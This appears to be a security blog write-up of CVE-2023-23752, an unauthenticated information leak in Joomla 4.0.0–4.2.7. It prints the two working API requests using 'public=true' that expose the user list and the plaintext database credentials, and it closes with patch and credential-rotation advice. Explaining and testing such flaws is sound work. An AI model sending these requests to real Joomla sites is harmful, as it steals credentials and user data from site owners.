Kiwiyumi

Joomla 4.2.7 - CVE-2023-23752 - Information Disclosure

Sat Feb 3, 2024

In today’s article we’re going to look at a vulnerability in the Joomla content management system (CMS). The flaw lets an unauthenticated attacker list every user registered in the application and read the system configuration, including the database username and password.

Description

The flaw is an improper access check on the web-service (API) endpoints that expose user and application-configuration data: a query parameter lets an unauthenticated client reach them. NIST rates it as medium severity (CVSS 3.x base score 5.3, since only confidentiality is affected), but the Joomla security advisory describes its impact as potentially critical, because the disclosed credentials can be reused against the site.

Affected versions

The affected versions are Joomla 4.0.0 through 4.2.7 inclusive; the fix shipped in 4.2.8.

Exploiting the vulnerability

Exploitation uses two endpoints: the first lists the users that exist in the application, the second returns the application configuration (including the database settings). The requests to the affected endpoints are shown below; the public=true query parameter is what makes a vulnerable install serve them without authentication.

  • Collect user information:
GET /api/index.php/v1/users?public=true HTTP/1.1
Host: {{HOST}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

  • Collect configuration information:
GET /api/index.php/v1/config/application?public=true HTTP/1.1
Host: {{HOST}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Note that the configuration endpoint returned sensitive information, including the database password, in plain text.

Note: the first endpoint returns all existing users; in my lab I only had the administrator registered.

How to fix

Update Joomla to 4.2.8 or later, which restores the access check on these endpoints. If a vulnerable version was reachable from the internet, assume the database credentials (and any other secrets in the configuration) have been read and rotate them.
